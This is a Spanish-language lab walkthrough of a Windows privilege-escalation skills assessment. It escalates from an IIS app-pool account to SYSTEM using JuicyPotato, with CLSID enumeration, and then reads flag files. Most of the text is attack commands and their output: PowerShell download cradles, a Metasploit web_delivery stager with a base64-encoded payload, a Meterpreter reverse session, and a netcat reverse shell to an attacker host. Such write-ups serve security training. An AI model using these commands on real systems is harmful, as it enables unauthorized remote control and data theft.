Con la opción -b podemos hacer un bruteforce de CLSIDs para encontrar uno válido:

C:\windows\Temp\JuicyPotatoNG.exe -l 1337 -p C:\windows\Temp\shell.exe -t * -b

	JuicyPotatoNG
	by decoder_it & splinter_code

[*] Bruteforcing 567 CLSIDs... 

Esta técnica genera más de 1000 procesos, debemos usarla con precaución.

Podemos ejecutar el siguiente script para buscar CLSIDs potencialmente válidos, para no generar tanto ruido en la infraestructura (ni bloquear los puertos):

powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.179/GetCLSID.ps1','C:\windows\Temp\GetCLSID.ps1')"

Al ejecutar este script nos saca de la shell, por lo que nos moveremos a una shell más robusta con Meterpreter.

Meterpreter Webdelivery

Configura un Powershell web delivery escuchando en el puerto 8080.

msfconsole -q -x "use exploit/multi/script/web_delivery; set TARGET 2; set payload windows/x64/meterpreter/reverse_http; set LHOST 10.10.14.179; set LPORT 4443; run"

msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started HTTP reverse handler on http://10.10.14.179:4443
[*] Using URL: http://10.10.14.179:8080/WYZepusQSpYoI
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABkAFEANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABkAFEANAAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAGQAUQA0AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQA3ADkAOgA4ADAAOAAwAC8AVwBZAFoAZQBwAHUAcwBRAFMAcABZAG8ASQAvAHMAMQA2AFYAcgB6AEcAUgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQA3ADkAOgA4ADAAOAAwAC8AVwBZAFoAZQBwAHUAcwBRAFMAcABZAG8ASQAnACkAKQA7AA==

Ejecutar el comando en la máquina objetivo

PS C:\windows\system32\inetsrv> powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemW

Recibiendo el Meterpreter

*] 10.129.225.46    web_delivery - Delivering Payload (4148 bytes)
[!] http://10.10.14.179:4443 handling request from 10.129.225.46; (UUID: 4o8cbxwu) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.14.179:4443 handling request from 10.129.225.46; (UUID: 4o8cbxwu) Staging x64 payload (204892 bytes) ...
[!] http://10.10.14.179:4443 handling request from 10.129.225.46; (UUID: 4o8cbxwu) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.179:4443 -> 10.129.225.46:49672) at 2025-04-01 00:08:03 +0200

msf6 exploit(multi/script/web_delivery) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                   Connection
  --  ----  ----                     -----------                                   ----------
  1         meterpreter x64/windows  IIS APPPOOL\DefaultAppPool @ WINLPE-SKILLS1-  10.10.14.179:4443 -> 10.129.225.46:49672 (10.129.225.46)
  
msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool

Conseguir CLSIDs válidos

Ahora si, ejecutamos GetCLSID.ps1:

PS C:\windows\system32\inetsrv> cd C:\windows\Temp\; .\GetCLSID.ps1
cd C:\windows\Temp\; .\GetCLSID.ps1

Name           Used (GB)     Free (GB) Provider      Root                      
----           ---------     --------- --------      ----                      
HKCR                                   Registry      HKEY_CLASSES_ROOT         
Looking for CLSIDs
Looking for APIDs
Joining CLSIDs and APIDs

PSPath            : Microsoft.PowerShell.Core\FileSystem::C:\Users\Public\Windo
                    ws_Server_2016_Standard
PSParentPath      : Microsoft.PowerShell.Core\FileSystem::C:\Users\Public
PSChildName       : Windows_Server_2016_Standard
PSDrive           : C
PSProvider        : Microsoft.PowerShell.Core\FileSystem
PSIsContainer     : True
Name              : Windows_Server_2016_Standard
Parent            : Public
Exists            : True
Root              : C:\
FullName          : C:\Users\Public\Windows_Server_2016_Standard
Extension         : 
CreationTime      : 4/1/2025 1:17:55 AM
CreationTimeUtc   : 4/1/2025 8:17:55 AM
LastAccessTime    : 4/1/2025 1:17:55 AM
LastAccessTimeUtc : 4/1/2025 8:17:55 AM
LastWriteTime     : 4/1/2025 1:17:55 AM
LastWriteTimeUtc  : 4/1/2025 8:17:55 AM
Attributes        : Directory
Mode              : d-----
BaseName          : Windows_Server_2016_Standard
Target            : {}
LinkType          : 

Ver el listado de CLSIDs válidos

PS C:\Users\Public> ls C:\Users\Public\Windows_Server_2016_Standard\

    Directory: C:\Users\Public\Windows_Server_2016_Standard


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----         4/1/2025   1:17 AM           2560 CLSID.list                    
-a----         4/1/2025   1:17 AM           6149 CLSIDs.csv   

Tenemos un listado y un csv. Vamos a echarles un vistazo:

PS C:\Users\Public> type C:\Users\Public\Windows_Server_2016_Standard\CLSID.list

{D6015EC3-FA16-4813-9CA1-DA204574F5DA}
{c980e4c2-c178-4572-935d-a8a429884806}
{F01D6448-0959-4E38-B6F6-B6643D4558FE}
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}
{03ca98d6-ff5d-49b8-abc6-03dd84127020}
{1F3775BA-4FA2-4CA0-825F-5B9EC63C0029}
<----SNIP---->
PS C:\Users\Public> Get-Content C:\Users\Public\Windows_Server_2016_Standard\*.csv | Format-Table

"AppId","LocalService","CLSID"
"{4A0F9AA8-A71E-4CC3-891B-76CAC67E67C0}","ALG","{D6015EC3-FA16-4813-9CA1-DA204574F5DA}"
"{88283d7c-46f4-47d5-8fc2-db0b5cf0cb54}","AppReadiness","{c980e4c2-c178-4572-935d-a8a429884806}"
"{8D315960-32C4-4235-8369-901DF222816F}","AppVClient","{F01D6448-0959-4E38-B6F6-B6643D4558FE}"
"{0B15AFD8-3A99-4A6E-9975-30D66F70BD94}","AxInstSv","{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8}"
"{69AD4AEE-51BE-439b-A92C-86AE490E8B30}","BITS","{03ca98d6-ff5d-49b8-abc6-03dd84127020}"
"{5E176815-9A63-4A69-810F-62E90D36612A}","cdpsvc","{1F3775BA-4FA2-4CA0-825F-5B9EC63C0029}"
"{52551A19-B337-498d-AE75-2283E29902DE}","CscService","{69486DD6-C19F-42e8-B508-A53F9F8E67B8}"

Con esta herramienta podemos extraer los CLSIDs válidos del listado:

Lo modificamos así:

test_clsid.bat
@echo off
:: Starting port, you can change it
set /a port=10000
SETLOCAL ENABLEDELAYEDEXPANSION

FOR /F %%i IN (C:\Users\Public\Windows_Server_2016_Standard\CLSID.list) DO (
   echo %%i !port!
   C:\Users\Public\JuicyPotatoNG.exe -z -l !port! -c %%i >> result.log
   set RET=!ERRORLEVEL!
   :: echo !RET!
   if "!RET!" == "1"  set /a port=port+1
)

Nos lo descargamos desde Kali:

powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.179/test_clsid.bat','C:\windows\Temp\test_clsid.bat')"

Y lo ejecutamos para conseguir CLSIDs válidos:

PS C:\windows\Temp> ./test_clsid.bat
./test_clsid.bat
{D6015EC3-FA16-4813-9CA1-DA204574F5DA} 10000
{c980e4c2-c178-4572-935d-a8a429884806} 10000
{F01D6448-0959-4E38-B6F6-B6643D4558FE} 10000
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} 10000
{03ca98d6-ff5d-49b8-abc6-03dd84127020} 10000
{1F3775BA-4FA2-4CA0-825F-5B9EC63C0029} 10000
{69486DD6-C19F-42e8-B508-A53F9F8E67B8} 10000
{FD3659E9-A920-4123-AD64-7FC76C7AACDF} 10000
{d20a3293-3341-4ae8-9aaf-8e397cb63c34} 10000
{42CBFAA7-A4A7-47BB-B422-BD10E9D02700} 10000
{7022a3b3-d004-4f52-af11-e9e987fee25f} 10000 -
{0A886F29-465A-4aea-8B8E-BE926BFAE83E} 10000 -
{8B4B437E-4CAB-4e83-89F6-7F9F7DF414EA} 10000 -
{8C482DCE-2644-4419-AEFF-189219F916B9} 10000 -
{42C21DF5-FB58-4102-90E9-96A213DC7CE8} 10000 -
{C63261E4-6052-41FF-B919-496FECF4C4E5} 10000 -
{FFE1E5FE-F1F0-48C8-953E-72BA272F2744} 10000 -
{1BE1F766-5536-11D1-B726-00C04FB926AF} 10000 -
{145B4335-FE2A-4927-A040-7C35AD3180EF} 10000 -
{D3DCB472-7261-43ce-924B-0704BD730D5F} 10000 -
{35b1d3bb-2d4e-4a7c-9af0-f2f677af7c30} 10000 -
{61738644-F196-11D0-9953-00C04FD919C1} 10000 -
{A9E69610-B80D-11D0-B9B9-00A0C922E750} 10000 -
{E0F55444-C140-4EF4-BDA3-621554EDB573} 10000 -
{08D9DFDF-C6F7-404A-A20F-66EEC0A609CD} 10000 -
{22f5b1df-7d7a-4d21-97f8-c21aefba859c} 10000 -
{5BF9AA75-D7FF-4aee-AA2C-96810586456D} 10000 -
{5C03E1B1-EB13-4DF1-8943-2FE8E7D5F309} 10000 -
{000C101C-0000-0000-C000-000000000046} 10000 -
{6FE54E0E-009F-4E3D-A830-EDFA71E1F306} 10000 -
{A47979D2-C419-11D9-A5B4-001185AD2B89} 10000 -
{854A20FB-2D44-457D-992F-EF13785D2B51} 10000 -
{BA677074-762C-444b-94C8-8C83F93F6605} 10000 -
{581333F6-28DB-41BE-BC7A-FF201F12F3F6} 10000 -
{F0FF8EBB-F14D-4369-BD2E-D84FBF6122D6} 10000 -
{14E1D985-892F-4F52-A866-6B1AE6A53DFE} 10000 -
{555F3418-D99E-4E51-800A-6E89CFD8B1D7} 10000 -
{A1F4E726-8CF1-11D1-BF92-0060081ED811} 10000 -
{B6C292BC-7C88-41EE-8B54-8EC92617E599} 10000 -
{65EE1DBA-8FF4-4a58-AC1C-3470EE2F376A} 10000 -
{F9A874B6-F8A8-4D73-B5A8-AB610816828B} 10000 -
{50D185B9-FFF3-4656-92C7-E4018DA4361D} 10000 -
{4661626C-9F41-40A9-B3F5-5580E80CB347} 10000 -
{3c6859ce-230b-48a4-be6c-932c0c202048} 10000 -
{F556F9B2-C810-44A2-BA7A-3AB8C24E666D} 10000 -
{0fb40f0d-1021-4022-8da0-aab0588dfc8b} 10000 -
{B91D5831-B1BD-4608-8198-D72E155020F7} 10000 -
{7D1933CB-86F6-4A98-8628-01BE94C9A575} 10000 -
{397a2e5f-348c-482d-b9a3-57d383b483cd} 10000 -
{0B5A2C52-3EB9-470a-96E2-6C6D4570E40F} 10000 -
{02ECA72E-27DA-40E1-BDB1-4423CE649AD9} 10000 -
{84C22490-C68A-4492-B3A6-3B7CB17FA122} 10000 -
{9A3E1311-23F8-42DC-815F-DDBC763D50BB} 10000 -
{97061DF1-33AA-4B30-9A92-647546D943F3} 10000 -
{119817C9-666D-4053-AEDA-627D0E25CCEF} 10000 -
{0E9A7BB5-F699-4D66-8A47-B919F5B6A1DB} 10000 -
{2781761E-28E2-4109-99FE-B9D127C57AFE} 10000 -
{8BC3F05E-D86B-11D0-A075-00C04FB68820} 10000 -
{3185a766-b338-11e4-a71e-12e3f512a338} 10000 -
{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381} 10000 # Probamos con este y funciona!
{30766BD2-EA1C-4F28-BF27-0B44E2F68DB7} 10000 -
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 10000 -
{0134A8B2-3407-4B45-AD25-E9F7C92A80BC} 10000 -
{5B3E6773-3A99-4A3D-8096-7765DD11785C} 10000 -

Ya es cuestión de ir probando uno por uno de la siguiente manera:

PS C:\windows\Temp> C:\windows\Temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c C:\windows\Temp\nc.exe 10.10.14.179 8443 -e cmd.exe" -t * -c "{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}"
Testing {7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381} 53375
......
[+] authresult 0
{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

Recibimos una Shell SYSTEM

afsh4ck@kali$ nc -lvnp 8443
listening on [any] 8443 ...
connect to [10.10.14.179] from (UNKNOWN) [10.129.225.46] 49799
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Acceso a la flag

c:\Users\Administrator\Desktop> dir

 Volume in drive C has no label.
 Volume Serial Number is 7029-F417

 Directory of c:\Users\Administrator\Desktop

08/08/2021  06:54 PM    <DIR>          .
08/08/2021  06:54 PM    <DIR>          ..
08/09/2021  06:08 PM                26 flag.txt
               1 File(s)             26 bytes
               2 Dir(s)  18,932,436,992 bytes free

c:\Users\Administrator\Desktop> type flag.txt
Ev3ry_sysadm1ns_***********!

Pregunta 4

Tras aumentar los privilegios, localice el archivo "confidential.txt". Envíe su contenido.

PS C:\Windows\system32> Get-ChildItem -Path C:\ -Filter "confidential.txt" -Recurse -ErrorAction SilentlyContinue


    Directory: C:\Users\Administrator\Music


Mode                LastWriteTime         Length Name                          
----                -------------         ------ ----                          
-a----         6/7/2021  12:41 PM             32 confidential.txt  
PS C:\Windows\system32> type C:\Users\Administrator\Music\confidential.txt

5e5a7dafa79d923de3340e1463******

AnteriorEscalada de privilegios en Windows: Skills AssessmentSiguienteEscenario 2

Última actualización hace 2 meses

¿Te fue útil?

Vamos a enviar el binario de en la máquina objetivo para extraer posibles credenciales almacenadas:

En este punto, vamos a la para enumerar más información.

LaZagne.exe
pregunta 2
🌋
📘
📘
📘
Release Fresh potatoes · ohpe/juicy-potatoGitHub
Logo
https://raw.githubusercontent.com/ohpe/juicy-potato/master/Test/test_clsid.bat
Online - Reverse Shell Generator
juicy-potato/GetCLSID.ps1 at master · ohpe/juicy-potatoGitHub
Logo
Logo
Page cover image